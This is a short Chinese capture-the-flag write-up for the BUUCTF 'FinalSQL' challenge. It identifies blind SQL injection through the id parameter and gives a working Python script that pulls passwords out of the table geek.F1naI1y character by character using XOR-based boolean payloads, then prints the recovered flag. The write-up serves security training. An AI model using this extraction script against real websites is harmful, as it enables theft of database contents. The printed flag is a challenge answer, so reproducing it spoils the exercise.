[极客大挑战 2019]FinalSQL1

打开题目

sql注入,点击1试一下

点击2试一下

点击3试一下

点击4

点击5

id=6试一下

感觉是sql盲注了

编写脚本

import requests

import string

from time import sleep

url = "http://9da9cb18-3096-413a-9476-8a177ffec31a.node4.buuoj.cn:81/search.php?id=0\^({})"

如果为真时的关键字匹配

base = 'Click others'

盲注的字符集

chars = string.printable

inject = "ord(substr(reverse((SELECT(GROUP_CONCAT(password))FROM(geek.F1naI1y))),{},1))={}"

for i in range(1, 1000):

continue_ = False

for c in chars:

u = url.format(inject.format(i,ord(c)))

res = requests.get(u)

while res.status_code == 429:

sleep(1)

res = requests.get(u)

if base in res.text:

print(c,end='',flush=True)

continue_ = True

break

if not continue_:

break(参考博客)

得到flag倒序,更正为

得到flag

flag{87c0b617-4e80-4135-b08c-ad013c856e27}

相关推荐
weixin_4723394610 分钟前
网络安全之重放攻击:原理、危害与防御之道
安全·web安全
咖啡啡不加糖12 分钟前
暴力破解漏洞与命令执行漏洞
java·后端·web安全
weixin_4723394614 分钟前
网络安全之注入攻击:原理、危害与防御之道
安全·web安全
kk在加油27 分钟前
Mysql锁机制与优化实践以及MVCC底层原理剖析
数据库·sql·mysql
码农12138号6 小时前
BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析
web安全·网络安全·文件上传漏洞·buuctf·解析漏洞
满昕欢喜10 小时前
SQL Server从入门到项目实践(超值版)读书笔记 20
数据库·sql·sqlserver
JAVA学习通13 小时前
Mybatis--动态SQL
sql·tomcat·mybatis
m0_6239556617 小时前
Oracle使用SQL一次性向表中插入多行数据
数据库·sql·oracle
jnrjian19 小时前
Oracle RAC环境 加错数据文件 的修复 归档非归档都没问题
sql·oracle
薄荷椰果抹茶1 天前
【网络安全基础】第六章---Web安全需求
安全·web安全